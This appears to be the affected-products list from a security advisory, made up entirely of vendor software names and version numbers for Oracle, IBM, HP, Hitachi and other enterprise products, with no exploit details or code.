    Oracle Identity Manager
    Oracle Identity Manager
    Oracle Fusion Middleware 11.1.2 2.0
    Oracle Fusion Middleware 11.1.2 1.0
    Oracle Fusion Middleware 11.1.1 7.0
    Oracle Fusion Middleware
    Oracle Enterprise Linux 5
    Oracle Enterprise Data Quality 9.0.11
    Oracle Enterprise Data Quality 8.1.2
    Oracle Communications WebRTC Session Controller 7.2
    Oracle Communications WebRTC Session Controller 7.1
    Oracle Communications WebRTC Session Controller 7.0
    Oracle Communications MetaSolv Solution 6.2.1 0.0
    NTT DATA Corporation TERASOLUNA Server Framework for Java 2.0.5 1
    NTT DATA Corporation TERASOLUNA Server Framework for Java 2.0 1
    Mandriva Business Server 1 X86 64
    Mandriva Business Server 1
    MandrakeSoft Enterprise Server 5 x86_64
    MandrakeSoft Enterprise Server 5
    Liferay Portal 6.2.1-ce-ga2-securit
    Liferay Portal 6.2.1
    Juniper Security Threat Response Manager 2013.2
    Juniper Security Threat Response Manager 2012.1
    Juniper Secure Analytics 2013.2
    Juniper Secure Analytics 2012.1
    IBM WebSphere Service Registry and Repository 8.5
    IBM WebSphere Service Registry and Repository 8.0
    IBM WebSphere Service Registry and Repository 7.5
    IBM WebSphere Service Registry and Repository 7.0
    IBM WebSphere Service Registry and Repository 6.3
    IBM WebSphere Service Registry and Repository 6.2
    IBM WebSphere Sensor Events 7.0
    IBM Websphere Portal 7.0
    IBM Websphere Portal 8.5
    IBM Websphere Portal 8.0
    IBM Websphere Portal 6.1
    IBM WebSphere Partner Gateway Express Edition
    IBM WebSphere Partner Gateway Express Edition 6.0
    IBM WebSphere Partner Gateway Enterprise Edition 6.2
    IBM WebSphere Partner Gateway Advanced Edition 6.2
    IBM WebSphere Lombardi Edition 7.2
    IBM WebSphere Lombardi Edition 7.1.0
    IBM WebSphere Enterprise Service Bus 7.5
    IBM WebSphere Enterprise Service Bus 7
    IBM WebSphere Enterprise Service Bus 6.2
    IBM Websphere Application Server 8.5.5
    IBM Websphere Application Server 8.0 2
    IBM Websphere Application Server 8.0 1
    IBM Websphere Application Server 7.0 21
    IBM Websphere Application Server 8.5
    IBM Websphere Application Server
    IBM Websphere Application Server 8.0
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server 7.0
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server
    IBM Websphere Application Server 6.1
    IBM WEB Interface for Content Management 1.0.4
    IBM Tivoli Workload Scheduler z/OS Connector 8.5.1
    IBM Tivoli Workload Scheduler z/OS Connector 8.5
    IBM Tivoli Workload Scheduler Distributed 8.6
    IBM Tivoli Workload Scheduler Distributed 8.5.1
    IBM Tivoli Workload Scheduler Distributed 8.5
    IBM Tivoli Workload Scheduler Distributed 8.4
    IBM Tivoli System Automation Application Manager 3.2.2
    IBM Tivoli System Automation Application Manager 3.2.1
    IBM Tivoli System Automation Application Manager 3.2
    IBM Tivoli System Automation Application Manager 3.1
    IBM Tivoli Storage Productivity Center 5.1.1 3
    IBM Tivoli Storage Productivity Center 5.1.1
    IBM Tivoli Storage Productivity Center 5.1
    IBM Tivoli Storage Productivity Center 4.2.2 143
    IBM Tivoli Storage Productivity Center
    IBM Tivoli Storage Productivity Center
    IBM Tivoli Storage Productivity Center
    IBM Tivoli Storage Productivity Center
    IBM Tivoli Storage Productivity Center 5.1
    IBM Tivoli Storage Productivity Center
    IBM Tivoli Storage Productivity Center
    IBM Tivoli Storage Productivity Center 4.2.1
    IBM Tivoli Storage Productivity Center 4.2.0
    IBM Tivoli Storage Productivity Center 4.1
    IBM Tivoli Storage Manager Administration Center 6.3
    IBM Tivoli Storage Manager Administration Center 6.2
    IBM Tivoli Storage Manager Administration Center 6.1
    IBM Tivoli Storage Manager 6.3.0
    IBM Tivoli Storage Manager 6.2
    IBM Tivoli Storage Manager 6.1
    IBM Tivoli Provisioning Manager for Software 5.1
    IBM Tivoli Provisioning Manager 7.2
    IBM Tivoli Provisioning Manager 7.1
    IBM Tivoli Provisioning Manager 5.1
    IBM Tivoli Netcool/OMNIbus Web GUI 7.4
    IBM Tivoli Netcool/OMNIbus Web GUI 7.3.1
    IBM Tivoli Netcool/OMNIbus Web GUI 7.3
    IBM Tivoli Netcool Configuration Manager 6.4.1
    IBM Tivoli Netcool Configuration Manager 6.3
    IBM Tivoli Netcool Configuration Manager 6.4
    IBM Tivoli Netcool Configuration Manager 6.2
    IBM Tivoli Integrated Portal 1.1.1 15
    IBM Tivoli Integrated Portal 1.1.1 14
    IBM Tivoli Integrated Portal 2.2
    IBM Tivoli Integrated Portal 2.1
    IBM Tivoli Integrated Portal
    IBM Tivoli Integrated Portal 1.1
    IBM Tivoli Identity Manager 5.1
    IBM Tivoli Identity Manager 5.0
    IBM Tivoli Foundations for Application Manager 1.2
    IBM Tivoli Endpoint Manager for Remote Control 9.0
    IBM Tivoli Endpoint Manager for Remote Control 8.2.1
    IBM Tivoli Endpoint Manager for Remote Control 9.0.1
    IBM Tivoli Endpoint Manager for Remote Control 8.2
    IBM Tivoli Dynamic Workload Console 8.5.1
    IBM Tivoli Dynamic Workload Console 8.5
    IBM Tivoli Dynamic Workload Console 8.4
    IBM Tivoli Dynamic Workload Console
    IBM Tivoli Composite Application Manager for Websphere 6.1
    IBM Tivoli Composite Application Manager for Application Diagnostics 7.1
    IBM Tivoli Application Dependency Discovery Manager 7.2.2
    IBM Tivoli Application Dependency Discovery Manager 7.2.1
    IBM Tivoli Application Dependency Discovery Manager 7.2
    IBM Tivoli Application Dependency Discovery Manager 7.1.2
    IBM Social Media Analytics 1.3
    IBM Social Media Analytics 1.2
    IBM Smart Analytics System 7700 0
    IBM Smart Analytics System 7600 0
    IBM Smart Analytics System 5710 0
    IBM Smart Analytics System 5600 2
    IBM Smart Analytics System 5600 1
    IBM Smart Analytics System 2050 0
    IBM Smart Analytics System 1050 0
    IBM Security SiteProtector System 3.1
    IBM Security SiteProtector System 3.0
    IBM Security QRadar 7.2.2
    IBM Security QRadar 7.2
    IBM Security QRadar 7.1
    IBM Security QRadar 7.0
    IBM Security Identity Manager 6.0
    IBM Records Manager 8.5
    IBM Records Manager 8.4
    IBM Rational Reporting for Development Intelligence 2.0.6
    IBM Rational Reporting for Development Intelligence 2.0.5
    IBM Rational Reporting for Development Intelligence 2.0.4
    IBM Rational Reporting for Development Intelligence 2.0.3
    IBM Rational Reporting for Development Intelligence 2.0.1
    IBM Rational Reporting for Development Intelligence 2.0 1
    IBM Rational Reporting for Development Intelligence 1.0.2 1
    IBM Rational Reporting for Development Intelligence 1.0.2
    IBM Rational Reporting for Development Intelligence 2.0
    IBM Rational Insight 1.1.1 3
    IBM Rational Insight 1.1.1 2
    IBM Rational Insight 1.1.1 1
    IBM Rational Insight 1.1.1
    IBM Rational Insight 1.0.1 1
    IBM Rational Insight 1.0.1
    IBM Rational Insight 1.1
    IBM Rational Insight 1.0.1 iFix1
    IBM Rational Application Developer 9.0.1
    IBM Rational Application Developer 8.5.5
    IBM Rational Application Developer 8.5.1
    IBM Rational Application Developer 8.0.4 3
    IBM Rational Application Developer 8.0.4 2
    IBM Rational Application Developer 8.0.4 1
    IBM Rational Application Developer 8.0.4
    IBM Rational Application Developer 8.0.3
    IBM Rational Application Developer 8.0.2
    IBM Rational Application Developer 8.0.1
    IBM Rational Application Developer 7.5.5 5
    IBM Rational Application Developer 7.5.5 3
    IBM Rational Application Developer 7.5.5 2
    IBM Rational Application Developer 7.5.5 1
    IBM Rational Application Developer 7.5.5
    IBM Rational Application Developer 7.5.4
    IBM Rational Application Developer 7.5.3
    IBM Rational Application Developer 7.5.2
    IBM Rational Application Developer 7.5.1
    IBM Rational Application Developer 7.0 9
    IBM Rational Application Developer 7.0 8
    IBM Rational Application Developer 7.0 7
    IBM Rational Application Developer 7.0 6
    IBM Rational Application Developer 7.0 5
    IBM Rational Application Developer 7.0 4
    IBM Rational Application Developer 7.0 3
    IBM Rational Application Developer 7.0 2
    IBM Rational Application Developer 7.0 10
    IBM Rational Application Developer 7.0 1
    IBM Rational Application Developer 9.1
    IBM Rational Application Developer 9.0
    IBM Rational Application Developer 8.5
    IBM Rational Application Developer 8.0
    IBM Rational Application Developer 7.5
    IBM Rational Application Developer 7.0
    IBM QRadar SIEM 7.2 MR2
    IBM QRadar SIEM 7.1 MR2
    IBM QRadar SIEM 7.0 MR5
    IBM Predictive Insight 9.1
    IBM Predictive Insight 7.0
    IBM OpenPages GRC Platform 7.0
    IBM OpenPages GRC Platform 6.2.1
    IBM OpenPages 7.0
    IBM OpenPages
    IBM OpenPages
    IBM OpenPages 6.0
    IBM OmniFind Enterprise Edition 9.1
    IBM Lotus Quickr for WebSphere Portal 8.5
    IBM Lotus Expeditor 6.2.3
    IBM Lotus Expeditor 6.2.2
    IBM Lotus Expeditor 6.2.1
    IBM Lotus Expeditor 6.2
    IBM Leads 9.1
    IBM Leads 7.0
    IBM Infosphere Master Data Management Server For Product Information 9.1
    IBM Infosphere Master Data Management Server For Product Information 9.0
    IBM InfoSphere Master Data Management - Collaborative Edition 11.0
    IBM InfoSphere Master Data Management - Collaborative Edition 10.1
    IBM InfoSphere Master Data Management - Collaborative Edition 10.0
    IBM InfoSphere MashupHub 3.0
    IBM InfoSphere MashupHub 2.0
    IBM InfoSphere Information Server
    IBM InfoSphere Information Server 9.1
    IBM InfoSphere Information Server 8.7
    IBM InfoSphere Information Server 8.5
    IBM InfoSphere Information Server 8.1
    IBM InfoSphere Information Server 8.0
    IBM InfoSphere Identity Insight 8.1
    IBM InfoSphere Identity Insight 8.0
    IBM InfoSphere Balanced Warehouse D5100
    IBM InfoSphere Balanced Warehouse C4000
    IBM InfoSphere Balanced Warehouse C3000
    IBM IBM InfoSphere Information Server 9.1
    IBM IBM InfoSphere Information Server 8.7
    IBM IBM InfoSphere Information Server 8.5
    IBM IBM InfoSphere Information Server 8.1
    IBM Financial Transaction Manager 2.1
    IBM FileNet P8 Platform Content Search Engine 4.5.1
    IBM FileNet P8 Platform Content Search Engine 5.1
    IBM FileNet P8 Platform Content Search Engine 5.0
    IBM FileNet Content Manager Content Engine 5.2.0
    IBM Endpoint Manager for Remote Control 9.1.0
    IBM DS8870 7.3
    IBM DS8870 7.2
    IBM DS8870 7.1
    IBM DS8870 7.0
    IBM Distributed Marketing 9.1
    IBM Distributed Marketing 9.0
    IBM Distributed Marketing 8.6
    IBM Distributed Marketing 8.5
    IBM Distributed Marketing 8.2
    IBM Distributed Marketing 8.0
    IBM Distributed Marketing 7.5
    IBM Distributed Marketing 7.0
    IBM Content Navigator 2.0.2
    IBM Content Navigator 2.0.1
    IBM Content Navigator 2.0
    IBM Content Manager Records Enabler 8.5
    IBM Content Manager Records Enabler 8.4
    IBM Content Collector 2.2
    IBM Content Analytics with Enterprise Search 3.0
    IBM Content Analytics with Enterprise Search 2.2
    IBM Contact Optimization 9.1
    IBM Contact Optimization 8.0
    IBM Contact Optimization 7.0
    IBM Connections 3.0 0
    IBM Connections 2.0.1 0
    IBM Connections 5.0
    IBM Connections 4.5
    IBM Connections 4.0
    IBM Connections
    IBM Connections
    IBM Connections 3.0.1
    IBM Connections 3.0
    IBM Connections
    IBM Connections
    IBM Connections
    IBM Connections
    IBM Connections
    IBM Connections
    IBM Cognos Business Intelligence 10.2.1
    IBM Cognos Business Intelligence 10.1.1
    IBM Cognos Business Intelligence 8.4.1
    IBM Cognos Business Intelligence 10.2
    IBM Cognos Business Intelligence 10.1
    IBM Campaign 9.1
    IBM Campaign 9.0
    IBM Campaign 8.6
    IBM Campaign 8.5
    IBM Campaign 8.3
    IBM Campaign 8.2
    IBM Campaign 8.1
    IBM Campaign 8.0
    IBM Campaign 7.6
    IBM Campaign 7.5
    IBM Campaign 7.4
    IBM Campaign 7.3
    IBM Campaign 7.2
    IBM Campaign 7.1
    IBM Campaign 7.0
    IBM Business Process Manager Standard 8.5.5
    IBM Business Process Manager Standard 8.5.0
    IBM Business Process Manager Standard 8.0.x
    IBM Business Process Manager Standard 7.5.0
    IBM Business Process Manager Express 8.5.5
    IBM Business Process Manager Express 8.5.0
    IBM Business Process Manager Express 8.0.0
    IBM Business Process Manager Express 7.5.0
    IBM Business Process Manager Advanced 8.5.5
    IBM Business Process Manager Advanced 8.5
    IBM Business Process Manager Advanced
    IBM Business Process Manager Advanced
    IBM Business Process Manager Advanced
    IBM Business Process Manager Advanced 8.0.0
    IBM Business Process Manager Advanced
    IBM Business Process Manager Advanced
    IBM Business Process Manager Advanced 7.5.0
    IBM Application Manager for Smart Business 1.2.1
    HP XP7 Global Link Manager Software 8.0.0-00
    HP XP7 Global Link Manager Software 7.6.0-02
    HP XP7 Global Link Manager Software 6.4.0-00
    HP XP P9000 Tiered Storage Manager 8.0.0-06
    HP XP P9000 Tiered Storage Manager 8.0.0-00
    HP XP P9000 Tiered Storage Manager 7.6.1-06
    HP XP P9000 Tiered Storage Manager 1.1.0-00
    HP XP P9000 Replication Manager 8.0.0-06
    HP XP P9000 Replication Manager 8.0.0-00
    HP XP P9000 Replication Manager 7.6.1-06
    HP XP P9000 Replication Manager 6.0.0-00
    HP XP P9000 Replication Manager 5.0.0-00
    HP SiteScope Monitors 11.32IP1
    HP SiteScope Monitors 11.20
    HP SiteScope 11.24
    HP SiteScope 11.22
    HP SiteScope 11.21
    HP SiteScope 11.20
    HP SiteScope 11.2
    HP SiteScope 11.12
    HP SiteScope 11.11
    HP SiteScope 11.10
    HP SiteScope 11.1
    HP IceWall Configuration Manager 3.0
    HP Device Manager 8.0.0-06
    HP Device Manager 8.0.0-00
    HP Device Manager 7.6.1-06
    HP Device Manager 1.0.0-00
    Hitachi Tuning Manager Software 7.0 01 (Windows)
    Hitachi Tuning Manager Software 7.0 01 (Solaris(SPARC))
    Hitachi Tuning Manager Software 7.0 (Windows)
    Hitachi Tuning Manager Software 7.0 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.4 02 (Windows)
    Hitachi Tuning Manager Software 6.4 02 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.4 01 (Windows)
    Hitachi Tuning Manager Software 6.4 01 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.2 -01 (Windows)
    Hitachi Tuning Manager Software 6.2 -01 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.2 -00 (Windows)
    Hitachi Tuning Manager Software 6.2 -00 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.1 -00 (Windows)
    Hitachi Tuning Manager Software 6.1 -00 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.0 (Windows)
    Hitachi Tuning Manager Software 6.0 (Solaris(SPARC))
    Hitachi Tuning Manager Software 8.0.0-05 (Windows)
    Hitachi Tuning Manager Software 8.0.0-05 (Linux(SuSE
    Hitachi Tuning Manager Software 8.0.0-05 (Linux(RHEL
    Hitachi Tuning Manager Software 8.0.0-04 (Windows)
    Hitachi Tuning Manager Software 8.0.0-04 (Linux)
    Hitachi Tuning Manager Software 8.0.0-03 (Windows)
    Hitachi Tuning Manager Software 8.0.0-03 (Linux)
    Hitachi Tuning Manager Software 8.0.0-00 (Windows)
    Hitachi Tuning Manager Software 8.0.0-00 (Linux(SuSE
    Hitachi Tuning Manager Software 8.0.0-00 (Linux(RHEL
    Hitachi Tuning Manager Software 7.6.1-05 (Windows)
    Hitachi Tuning Manager Software 7.6.1-05 (Solaris)
    Hitachi Tuning Manager Software 7.6.1-05 (Solaris(x6
    Hitachi Tuning Manager Software 7.6.1-05 (Solaris(SP
    Hitachi Tuning Manager Software 7.6.1-05 (Linux(RHEL
    Hitachi Tuning Manager Software 7.5.0-02
    Hitachi Tuning Manager Software 7.4.0-02 (Windows)
    Hitachi Tuning Manager Software 7.4.0-02 (Solaris(SP
    Hitachi Tuning Manager Software 7.4.0-02 (Linux)
    Hitachi Tuning Manager Software 7.4.0-01 (Windows)
    Hitachi Tuning Manager Software 7.4.0-01 (Solaris(SP
    Hitachi Tuning Manager Software 7.4.0-01 (Linux)
    Hitachi Tuning Manager Software 7.2.1-00
    Hitachi Tuning Manager Software 7.1.0-00 (Windows)
    Hitachi Tuning Manager Software 7.1.0 (Linux)
    Hitachi Tuning Manager Software 7.0.0-00
    Hitachi Tuning Manager Software 6.4.0-03 (Windows)
    Hitachi Tuning Manager Software 6.4.0-03 (Solaris(SP
    Hitachi Tuning Manager Software 6.0.0 (Solaris)
    Hitachi Tuning Manager Software 3.5.0 (windows)
    Hitachi Tiered Storage Manager Software 7.3 -00 (Windows)
    Hitachi Tiered Storage Manager Software 7.3 -00 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 7.3 -00 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 7.3 -00 (Linux(SLES))
    Hitachi Tiered Storage Manager Software 7.3 -00 (Linux(RHEL))
    Hitachi Tiered Storage Manager Software 7.1.1 -00(Windows)
    Hitachi Tiered Storage Manager Software 7.1.1 -00(Solaris(x64))
    Hitachi Tiered Storage Manager Software 7.1.1 -00(Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 7.1.1 -00(Linux(SLES))
    Hitachi Tiered Storage Manager Software 7.1.1 -00(Linux(RHEL))
    Hitachi Tiered Storage Manager Software 7.0 -00 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.2 -01 (Windows)
    Hitachi Tiered Storage Manager Software 6.2 -01 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.2 -01 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.2 -01 (Linux)
    Hitachi Tiered Storage Manager Software 6.2 -00 (Windows)
    Hitachi Tiered Storage Manager Software 6.2 -00 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.2 -00 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.2 -00 (Linux)
    Hitachi Tiered Storage Manager Software 6.1.1 -01 (Windows)
    Hitachi Tiered Storage Manager Software 6.1.1 -01 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.1.1 -01 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.1.1 -01 (Linux)
    Hitachi Tiered Storage Manager Software 6.1.1 -00 (Windows)
    Hitachi Tiered Storage Manager Software 6.1.1 -00 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.1.1 -00 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.1.1 -00 (Linux)
    Hitachi Tiered Storage Manager Software 6.1 -01 (Windows)
    Hitachi Tiered Storage Manager Software 6.1 -01 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.1 -01 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.1 -01 (Linux)
    Hitachi Tiered Storage Manager Software 6.1 -00 (Windows)
    Hitachi Tiered Storage Manager Software 6.1 -00 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.1 -00 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.1 -00 (Linux)
    Hitachi Tiered Storage Manager Software 8.0.0-05 (Windows)
    Hitachi Tiered Storage Manager Software 8.0.0-05 (Linux(SuSE
    Hitachi Tiered Storage Manager Software 8.0.0-05 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 8.0.0-00 (Windows)
    Hitachi Tiered Storage Manager Software 8.0.0-00 (Linux(SuSE
    Hitachi Tiered Storage Manager Software 8.0.0-00 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 7.6.1-05 (Windows)
    Hitachi Tiered Storage Manager Software 7.6.1-05 (Solaris(x6
    Hitachi Tiered Storage Manager Software 7.6.1-05 (Solaris(SP
    Hitachi Tiered Storage Manager Software 7.6.1-05 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 7.5.0-02
    Hitachi Tiered Storage Manager Software 7.2.1-00
    Hitachi Tiered Storage Manager Software 7.1.1-00
    Hitachi Tiered Storage Manager Software 7.1.0-00 (Windows)
    Hitachi Tiered Storage Manager Software 7.1.0-00 (Solaris(SP
    Hitachi Tiered Storage Manager Software 7.1.0-00 (Linux(SLES
    Hitachi Tiered Storage Manager Software 7.1.0-00 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 7.0.1-02 (Windows)
    Hitachi Tiered Storage Manager Software 7.0.1-02 (linux(SLES
    Hitachi Tiered Storage Manager Software 7.0.1-02 (linux(RHEL
    Hitachi Tiered Storage Manager Software 7.0.0-00 (Windows)
    Hitachi Tiered Storage Manager Software 7.0.0-00 (Solaris(SP
    Hitachi Tiered Storage Manager Software 7.0.0-00 (linux(SLES
    Hitachi Tiered Storage Manager Software 7.0.0-00 (linux(RHEL
    Hitachi Tiered Storage Manager Software 6.4.0-08 (Windows)
    Hitachi Tiered Storage Manager Software 6.4.0-08 (Solaris(SP
    Hitachi Tiered Storage Manager Software 6.4.0-08 (Linux(SLES
    Hitachi Tiered Storage Manager Software 6.4.0-08 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 6.4.0-07 (Windows)
    Hitachi Tiered Storage Manager Software 6.4.0-07 (Solaris(SP
    Hitachi Tiered Storage Manager Software 6.4.0-07 (linux(SLES
    Hitachi Tiered Storage Manager Software 6.4.0-07 (linux(RHEL
    Hitachi Tiered Storage Manager Software 6.3.0-00 (linux(SLES
    Hitachi Tiered Storage Manager Software 6.2.0-00 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 6.0.0-00 (Windows)
    Hitachi Tiered Storage Manager Software 6.0.0-00 (Solaris(SP
    Hitachi Tiered Storage Manager Software 0
    Hitachi Raplication Manager Software 8.0.0-05 (Linux(RHEL
    Hitachi Raplication Manager Software 8.0.0-00 (Linux(SuSE
    Hitachi Raplication Manager Software 8.0.0-00 (Linux(RHEL
    Hitachi Raplication Manager Software 7.6.1-05 (Windows)
    Hitachi Raplication Manager Software 7.6.1-05 (Solaris(x6
    Hitachi Raplication Manager Software 7.6.1-05 (Solaris(SP
    Hitachi Raplication Manager Software 7.6.1-05 (Linux(RHEL
    Hitachi JP1/Performance Management - Web Console 10-00-03 (Windows)
    Hitachi JP1/Performance Management - Web Console 10-00-03 (Solaris)
    Hitachi JP1/Performance Management - Web Console 10-00-03 (Linux)
    Hitachi JP1/Performance Management - Web Console 10-00-03 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 10-00-03 (AIX)
    Hitachi JP1/Performance Management - Web Console 10-00-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 10-00-00 (Solaris)
    Hitachi JP1/Performance Management - Web Console 10-00-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 10-00-00 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 10-00-00 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-50-03 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-50-03 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-50-03 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-50-03 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-50-03 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-50-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-50-00 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-50-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-50-00 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-50-00 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-10-10 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-10-10 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-10-10 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-10-10 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-10-10 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-10-03
    Hitachi JP1/Performance Management - Web Console 09-10-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-10-00 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-10-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-10-00 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-10-00 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-10
    Hitachi JP1/Performance Management - Web Console 09-00-12 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-00-12 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-00-12 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-00-12 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-00-12 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-00-08
    Hitachi JP1/Performance Management - Web Console 09-00-07
    Hitachi JP1/Performance Management - Web Console 09-00-02
    Hitachi JP1/Performance Management - Web Console 09-00-01
    Hitachi JP1/Performance Management - Web Console 09-00-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-00-00 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-00-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-00-00 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-00-00 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-00-00
    Hitachi JP1/Performance Management - Web Console 09-00
    Hitachi JP1/Performance Management - Web Console 08-50-13 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-50-13 (Solaris)
    Hitachi JP1/Performance Management - Web Console 08-50-13 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-50-13 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 08-50-13 (AIX)
    Hitachi JP1/Performance Management - Web Console 08-50-09
    Hitachi JP1/Performance Management - Web Console 08-50-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-50-00 (Solaris)
    Hitachi JP1/Performance Management - Web Console 08-50-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-50-00 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 08-50-00 (AIX)
    Hitachi JP1/Performance Management - Web Console 08-50
    Hitachi JP1/Performance Management - Web Console 08-11-08 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-11-08 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-11-07
    Hitachi JP1/Performance Management - Web Console 08-11-01
    Hitachi JP1/Performance Management - Web Console 08-11-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-11-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-11-00
    Hitachi JP1/Performance Management - Web Console 08-11
    Hitachi JP1/Performance Management - Web Console 08-10-08 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-10-08 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-10-07
    Hitachi JP1/Performance Management - Web Console 08-10-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-10-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-10
    Hitachi JP1/Performance Management - Web Console 08-00-12 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-00-12 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-00-11
    Hitachi JP1/Performance Management - Web Console 08-00-03
    Hitachi JP1/Performance Management - Web Console 08-00-02
    Hitachi JP1/Performance Management - Web Console 08-00-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-00-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-00-00
    Hitachi JP1/Performance Management - Web Console 08-00
    Hitachi JP1/Performance Management - Web Console 0
    Hitachi JP1/Performance Management - Manager Web Option 07-54 (Windows)
    Hitachi JP1/Performance Management - Manager Web Option 07-54 (Solaris)
    Hitachi JP1/Performance Management - Manager Web Option 07-00 (Windows)
    Hitachi JP1/Performance Management - Manager Web Option 07-00 (Solaris)
    Hitachi Job Management Partner 1/Performance Management - Web Console 0
    Hitachi Global Link Manager Software 6.6 -00 (Windows)
    Hitachi Global Link Manager Software 6.5 -00 (Windows)
    Hitachi Global Link Manager Software 6.2 -01 (Windows)
    Hitachi Global Link Manager Software 6.2 -00 (Windows)
    Hitachi Global Link Manager Software 6.1 -01 (Windows)
    Hitachi Global Link Manager Software 6.1 -00 (Windows)
    Hitachi Global Link Manager Software 8.0.0-00 (Windows)
    Hitachi Global Link Manager Software 8.0.0-00 (Linux(SuSE
    Hitachi Global Link Manager Software 8.0.0-00 (Linux(RHEL
    Hitachi Global Link Manager Software 7.6.1-01 (Windows)
    Hitachi Global Link Manager Software 7.6.1-01 (Solaris(x6
    Hitachi Global Link Manager Software 7.6.1-01 (Solaris(SP
    Hitachi Global Link Manager Software 7.6.1-01 (Linux(RHEL
    Hitachi Device Manager Software 7.4 -00 (Windows)
    Hitachi Device Manager Software 7.4 -00 (Solaris(SPARC))
    Hitachi Device Manager Software 7.4 -00 (Linux(SLES))
    Hitachi Device Manager Software 7.4 -00 (Linux(RHEL))
    Hitachi Device Manager Software 7.3 -00(Solaris(x64))
    Hitachi Device Manager Software 7.3 -00(Solaris(SPARC))
    Hitachi Device Manager Software 7.3 -00(Linux(SLES))
    Hitachi Device Manager Software 7.3 -00 (Windows)
    Hitachi Device Manager Software 7.3 -00 (Linux(RHEL))
    Hitachi Device Manager Software 7.0 -00 (Solaris(x64))
    Hitachi Device Manager Software 6.2 -02 (Windows)
    Hitachi Device Manager Software 6.2 -02 (Solaris(x64))
    Hitachi Device Manager Software 6.2 -02 (Solaris(SPARC))
    Hitachi Device Manager Software 6.2 -02 (Linux)
    Hitachi Device Manager Software 6.2 -01 (Windows)
    Hitachi Device Manager Software 6.2 -01 (Solaris(x64))
    Hitachi Device Manager Software 6.2 -01 (Solaris(SPARC))
    Hitachi Device Manager Software 6.2 -01 (Linux)
    Hitachi Device Manager Software 6.2 -00 (Windows)
    Hitachi Device Manager Software 6.2 -00 (Solaris(x64))
